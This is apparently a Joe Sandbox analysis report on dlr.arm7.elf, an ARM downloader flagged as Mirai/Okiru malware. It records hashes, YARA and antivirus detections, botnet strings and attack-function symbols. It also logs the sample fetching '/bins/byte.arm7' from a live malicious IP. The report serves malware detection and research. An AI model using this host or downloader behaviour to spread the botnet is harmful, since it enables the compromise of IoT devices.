Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
dlr.arm7.elf

Overview

General Information

Sample name:dlr.arm7.elf
Analysis ID:1542866
MD5:b3647c424fd81544eede91b8e8182836
SHA1:155f514429c4de561025dda90024270b6adb3c62
SHA256:addff0d258036b04083416578c0da6cb7a4ed10c1bb343f5d19b505d1c20f68f
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru
Score:76
Range:0 - 100
Whitelisted:false

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Contains symbols with names commonly found in malware
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample and/or dropped files contains symbols with suspicious names
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1542866
Start date and time:2024-10-26 19:25:58 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 37s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:dlr.arm7.elf
Detection:MAL
Classification:mal76.troj.linELF@0/1@0/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: dlr.arm7.elf
Command:/tmp/dlr.arm7.elf
PID:5531
Exit Code:5
Exit Code Info:
Killed:False
Standard Output:
byte
bro
Standard Error:
  • system is lnxubuntu20
  • dlr.arm7.elf (PID: 5531, Parent: 5450, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/dlr.arm7.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
/tmp/byteJoeSecurity_OkiruYara detected OkiruJoe Security
    /tmp/byteJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: /tmp/byteAvira: detection malicious, Label: EXP/ELF.Mirai.Bootnet.o
      Source: dlr.arm7.elfReversingLabs: Detection: 47%
      Source: byte.12.drString: byte/proc/%d/net/tcp %*d: %*x:%x/proc//proc/%s/exe/proc/self/exe/proc/proc/%d/cmdlinenetstatwgettftpftpcurlbusybox/bin/busyboxvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/soraJoshohajime902i13BzSxLxBxeYHOHO-LUGO7HOHO-U79OLJuYfouyf87NiGGeR69xdSO190Ij1XLOLKIKEEEDDEekjheory98escansh4MDMAfdevalvexscanspcMELTEDNINJAREALZflexsonskidsscanx86MISAKI-U79OLfoAxi102kxeswodjwodjwojMmKiy7f87lfreecookiex86sysgpufrgegesysupdater0DnAzepdNiGGeRD0nks69frgreu0x766f6964NiGGeRd0nks1337gafturasgbsigboa120i3UI49OaF3geaevaiolmao123123aOfurain0n4H34DggTrexewwasads1293194hjXDOthLaLosnggtwget-log1337SoraLOADERSAIAKINAggtq1378bfp919GRB1Q2SAIAKUSOggtr14FaSEXSLAVE1337ggtt1902a3u912u3u4haetrghbr19ju3dSORAojkf120hehahejeje922U2JDJA901F91SlaVLav12helpmedaddthhhhh2wgg9qphbqSlav3Th3seD3viceshzSmYZjYMQ5GbfSoRAxD123LOLiaGv5aA3SoRAxD420LOLinsomni640277SoraBeReppin1337ipcamCache66tlGg9QjUYfouyf876ke3TOKYO3lyEeaXul2dULCVxh93OfjHZ2zTY2gD6MZvKc7KU6rmMkiy6f87lA023UU4U24UIUTheWeekndmioribitchesA5p9TheWeekndsmnblkjpoiAbAdTokyosnebAkiruU8inTznetstatsAlexW9RCAKM20TnewnetwordAyo215WordnloadsBAdAsVWordmanenotyakuzaaBelchWordnetsobpBigN0gg0r420X0102I34fofhasfhiafhoiX19I239124UIUoismXSHJEHHEIIHWOolsVNwo12DeportedDeportedXkTer0GbA1onry0v03FortniteDownLOLZY0urM0mGaypussyfartlmaojkGrAcEnIgGeRaNnYvdGkqndCOqGeoRBe6BEGuiltyCrownZEuS69s4beBsEQhdHOHO-KSNDOZEuz69sat1234aj93hJ23scanHAalie293z0k2LscanJoshoARMHellInSideayyyGangShitscanJoshoARM5HighFryb1glscanJoshoARM6IWhPyucDbJboatnetzscanJoshoARM7IuYgujeIqnbtbatrtahzexsexscanJoshoM68KJJDUHEWBBBIBscanJoshoMIPSJSDGIEVIVAVIGcKbVkzGOPascanJoshoMPSLccADscanJoshoPPCKAZEN-OIU97chickenxingsscanJoshoSH4yakuskzm8KAZEN-PO78HcleanerscanJoshoSPCKAZEN-U79OLdbeefscanJoshoX86yakuz4c24KETASHI32ddrwelperscanarm5zPnr6HpQj2Kaishi-Iz90Ydeexecscanarm6zdrtfxcgyKatrina32doCP3fVjscanarm7zxcfhuioKsif91je39scanm68kKuasadvrhelperl33t_feetl33tl33tfeetscanmipsKuasaBinsMateeQnOhRk85rscanmpslLOLHHHOHOHBUIeXK20CL12ZnyamezyQBotBladeSPOOKYhikariwasherep4029x91xx32uhj4gbejhwizardzhra.outboatnetdbgcondiheroshimaskid.dbglzrdPownedSecurity69.aresfxlyazsxhyUNSTABLEunstable_is_the_story_of_the_universemoobotjnsd9sdoilayourmomgaeissdfjiougsiojOasisSEGRJIJHFVNHSNHEIHFOSapep999KOWAI-BAdAsVKOWAI-SADjHKipU7Ylairdropmalwareyour_verry_fucking_gayBig-Bro-Brightsefaexecshirololieagle.For-Gai-Mezy0x6axNLcloqkisvspookymythSwergjmioGKILLEJW(IU(JIWERGFJGJWJRGHetrhwewrtheIuFdKssCxzjSDFJIjioOnrYoXd666ewrtkjokethajbdf89wu823AAaasrdgsWsGA4@F6FGhostWuzHere666BOGOMIPSbeastmodedvrHelperbestmodesfc6aJfIuYDemon.xeno-is-godICY-P-0ODIJgSHUIHIfhwrgLhu87VhvQPzlunadakuexecbinTacoBellGodYololigangExecutionorbitclientAmnesi
      Source: global trafficHTTP traffic detected: GET /bins/byte.arm7 HTTP/1.0Data Raw: 00 00 Data Ascii:
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
      Source: global trafficHTTP traffic detected: GET /bins/byte.arm7 HTTP/1.0Data Raw: 00 00 Data Ascii:

      System Summary

      barindex
      Source: ELF static info symbol of initial sampleName: attack.c
      Source: ELF static info symbol of initial sampleName: attack_get_opt_int
      Source: ELF static info symbol of initial sampleName: attack_get_opt_ip
      Source: ELF static info symbol of initial sampleName: attack_get_opt_str
      Source: ELF static info symbol of initial sampleName: attack_init
      Source: ELF static info symbol of initial sampleName: attack_method.c
      Source: ELF static info symbol of initial sampleName: attack_method_greeth
      Source: ELF static info symbol of initial sampleName: attack_method_greip
      Source: ELF static info symbol of initial sampleName: attack_method_std
      Source: ELF static info symbol of initial sampleName: attack_method_tcpack
      Source: byte.12.drELF static info symbol of dropped file: __gnu_unwind_execute
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: classification engineClassification label: mal76.troj.linELF@0/1@0/0
      Source: /tmp/dlr.arm7.elf (PID: 5531)File written: /tmp/byteJump to dropped file
      Source: /tmp/dlr.arm7.elf (PID: 5531)Queries kernel information via 'uname': Jump to behavior
      Source: dlr.arm7.elf, 5531.1.00007ffd1dd46000.00007ffd1dd67000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/dlr.arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/dlr.arm7.elf
      Source: dlr.arm7.elf, 5531.1.000056085ea37000.000056085eb65000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
      Source: dlr.arm7.elf, 5531.1.000056085ea37000.000056085eb65000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/arm
      Source: dlr.arm7.elf, 5531.1.00007ffd1dd46000.00007ffd1dd67000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: /tmp/byte, type: DROPPED
      Source: Yara matchFile source: /tmp/byte, type: DROPPED

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: /tmp/byte, type: DROPPED
      Source: Yara matchFile source: /tmp/byte, type: DROPPED
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid AccountsWindows Management Instrumentation1
      Scripting
      Path Interception1
      Masquerading
      OS Credential Dumping11
      Security Software Discovery
      Remote ServicesData from Local System1
      Non-Application Layer Protocol
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
      Ingress Tool Transfer
      Automated ExfiltrationData Encrypted for Impact
      No configs have been found
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      SourceDetectionScannerLabelLink
      dlr.arm7.elf47%ReversingLabsLinux.Backdoor.Mirai
      SourceDetectionScannerLabelLink
      /tmp/byte100%AviraEXP/ELF.Mirai.Bootnet.o
      /tmp/byte79%ReversingLabsLinux.Trojan.Mirai
      No Antivirus matches
      No Antivirus matches
      No contacted domains info
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      154.216.20.69
      unknownSeychelles
      135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      154.216.20.69dlr.arm6.elfGet hashmaliciousOkiruBrowse
      • /bins/byte.arm6
      dlr.x86.elfGet hashmaliciousOkiruBrowse
      • /bins/byte.x86
      dlr.mpsl.elfGet hashmaliciousOkiruBrowse
      • /bins/byte.mpsl
      dlr.mips.elfGet hashmaliciousOkiruBrowse
      • /bins/byte.mips
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      SKHT-ASShenzhenKatherineHengTechnologyInformationCodlr.arm6.elfGet hashmaliciousOkiruBrowse
      • 154.216.20.69
      A0Cr6LQ52c.elfGet hashmaliciousMiraiBrowse
      • 154.216.19.13
      Y48ThN7tMs.elfGet hashmaliciousMiraiBrowse
      • 154.216.19.13
      nsLuqUOchO.elfGet hashmaliciousMiraiBrowse
      • 154.216.19.13
      pkKNSB7f9E.elfGet hashmaliciousMiraiBrowse
      • 154.216.19.13
      5q9dF23ShO.elfGet hashmaliciousMiraiBrowse
      • 154.216.19.13
      dlr.x86.elfGet hashmaliciousOkiruBrowse
      • 154.216.20.69
      boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
      • 154.216.19.13
      dlr.mpsl.elfGet hashmaliciousOkiruBrowse
      • 154.216.20.69
      dlr.mips.elfGet hashmaliciousOkiruBrowse
      • 154.216.20.69
      No context
      No context
      Process:/tmp/dlr.arm7.elf
      File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
      Category:dropped
      Size (bytes):161981
      Entropy (8bit):6.017026154297146
      Encrypted:false
      SSDEEP:3072:ZuxucGNj1tc4ag5gJGW4f5XK7eLuvII4qYuNzEM/9Od4Wt:sxucGRs4ag5UGWW5MeyvPYuNYM/9Od4+
      MD5:4EB42B9C0324C52AA1ABECA8EA1F79A8
      SHA1:00EC248B8264E7816F878ED08EADE699E17D7F23
      SHA-256:5B7BE271C2A864158115154710147CC12077E4D87F8A0701534E27AD32B2ABDE
      SHA-512:EFEEF18BB311D6C5B9DC656DE611DEB09AB61C5AC4B2EA79A2A77D0AA14DACA9A83C5502F1BCEB529A2F362573086EB9D81CE9F526708419FF5FD40EAF647086
      Malicious:true
      Yara Hits:
      • Rule: JoeSecurity_Okiru, Description: Yara detected Okiru, Source: /tmp/byte, Author: Joe Security
      • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /tmp/byte, Author: Joe Security
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      • Antivirus: ReversingLabs, Detection: 79%
      Reputation:low
      Preview:.ELF..............(.........4...........4. ...(........p............................................................................l....;..........................................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../...............-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../................................. ... -...-.......-......0..9...3..L............P..@-..@.......0....S.................0....S...............P..............@..../..@.......G-......`...p...... ...6....p..0...0....P..P...P....U......G..../.6....p..@........P..........7.. ....... ......l4......j4..l0........Q.....`0... .......0....S..................0....S...........P.........U4........... ..$0.........../.....0...4....O-...Q...M..@...P..........O..../.........!<.. 4...,...4....T.......... ....T.. ............Y......1...p...0D...S....:.........`...0...........pg..............0G.. P..`F...V..0...@... ......
      File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
      Entropy (8bit):4.801842234738437
      TrID:
      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
      File name:dlr.arm7.elf
      File size:1'500 bytes
      MD5:b3647c424fd81544eede91b8e8182836
      SHA1:155f514429c4de561025dda90024270b6adb3c62
      SHA256:addff0d258036b04083416578c0da6cb7a4ed10c1bb343f5d19b505d1c20f68f
      SHA512:f86a4df3ed229ecbafd7c740c48003d50d28e5ce229889791be2248eab451340851bcd8e5c54facd87b5e05e6436fb50008d625d520139e459d7f66e6c97342d
      SSDEEP:24:uAd9KGpa7Urz/jlfoZMAXK1hH9Vev3gRGaJ9i9BBuLlgCk9gD10yd:uA9KGpa7UrLZo0I+J+Bu5kE10yd
      TLSH:B431DF91A3D05DBCC8E411BEBE5B0354B378AF04E0CE3222822C67286D2AE7D5D37456
      File Content Preview:.ELF..............(.........4...........4. ...(.....................l...l...............l...l...l.......................l...l...l...................Q.td.........................................8...<...4...........(.."...#...../...-.......M................

      ELF header

      Class:ELF32
      Data:2's complement, little endian
      Version:1 (current)
      Machine:ARM
      Version Number:0x1
      Type:EXEC (Executable file)
      OS/ABI:UNIX - System V
      ABI Version:0
      Entry Point Address:0x83ac
      Flags:0x4000002
      ELF Header Size:52
      Program Header Offset:52
      Program Header Size:32
      Number of Program Headers:4
      Section Header Offset:1220
      Section Header Size:40
      Number of Section Headers:7
      Header String Table Index:6
      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
      NULL0x00x00x00x00x0000
      .textPROGBITS0x80c00xc00x3600x00x6AX0016
      .rodataPROGBITS0x84200x4200x4c0x10x32AMS004
      .tbssNOBITS0x1046c0x46c0x80x00x403WAT004
      .gotPROGBITS0x1046c0x46c0x100x40x3WA004
      .ARM.attributesARM_ATTRIBUTES0x00x47c0x140x00x0001
      .shstrtabSTRTAB0x00x4900x340x00x0001
      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
      LOAD0x00x80000x80000x46c0x46c5.21950x5R E0x8000.text .rodata
      LOAD0x46c0x1046c0x1046c0x100x100.33730x6RW 0x8000.tbss .got
      TLS0x46c0x1046c0x1046c0x00x80.00000x4R 0x4.tbss
      GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
      TimestampSource PortDest PortSource IPDest IP
      Oct 26, 2024 19:26:49.207370996 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:49.212747097 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:49.212835073 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:49.214157104 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:49.219510078 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.077810049 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.078018904 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.078027964 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.078038931 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.078047037 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.078059912 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.078062057 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.078073025 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.078080893 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.078084946 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.078092098 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.078094959 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.078103065 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.078110933 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.078124046 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.078124046 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.078124046 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.078135967 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.078135967 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.083679914 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.083702087 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.083714008 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.083741903 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.083741903 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.083741903 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.214338064 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.214350939 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.214361906 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.214374065 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.214385986 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.214395046 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.214411974 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.214411974 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.214411974 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.214425087 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.214903116 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.214972973 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.215003014 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.215014935 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.215024948 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.215184927 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.215888977 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.215935946 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.215945959 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.216039896 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.331619024 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.331682920 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.331695080 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.331753969 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.331765890 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.332084894 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.332256079 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.332267046 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.332278013 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.332289934 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.332290888 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.333092928 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.334492922 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.349838972 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.349881887 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.350012064 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.350032091 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.351843119 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.447644949 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.447679043 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.447695971 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.448673010 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.448688984 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.448698997 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.448729992 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.448744059 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.448760986 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.449071884 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.449086905 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.449290991 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.449340105 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.450819969 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.466809034 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.466860056 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.466890097 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.466929913 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.466959000 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.467116117 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.564976931 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.565026999 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.565063000 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.565696001 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.565876007 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.565928936 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.565963984 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.565999031 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.566298962 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.566349030 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.566385031 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.566418886 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.567955017 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.598273993 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.603882074 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.603935003 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.603970051 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.604005098 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.604039907 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.605360985 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.682946920 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.683360100 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.684278011 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.684340000 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.684392929 CEST8052716154.216.20.69192.168.2.15
